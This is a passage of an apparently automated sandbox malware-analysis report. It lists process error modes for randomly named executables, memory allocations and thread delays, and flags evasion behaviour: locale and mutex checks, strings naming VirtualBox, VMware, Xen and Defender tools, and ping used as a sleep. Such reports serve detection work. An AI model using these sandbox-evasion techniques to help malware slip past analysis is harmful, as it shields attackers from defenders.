                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain (may stop execution after checking locale)
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                  Found evasive API chain (may stop execution after checking mutex)
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_12-7527
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES
                  Uses ping.exe to sleep
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory allocated: 1EBAAD60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory allocated: 1EBC4770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1600000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2FE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 4FE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 8630000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 9630000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 9800000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: A800000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: B2A0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: D260000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: E940000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599561
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599299
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599174
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598893
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598483
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598351
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598222
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598084
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597813
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597637
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597472
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597346
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597037
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596914
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596135
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595776
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595495
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594786
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594217
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 590125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 588906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 588453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 587906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 585188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 584641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 584063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 583359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 582781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 582250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 581563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 581094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 580531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 580031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 579375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 578844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 578359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 577797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 577109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 576531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 576281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573904
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573648
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572941
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572634
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572276
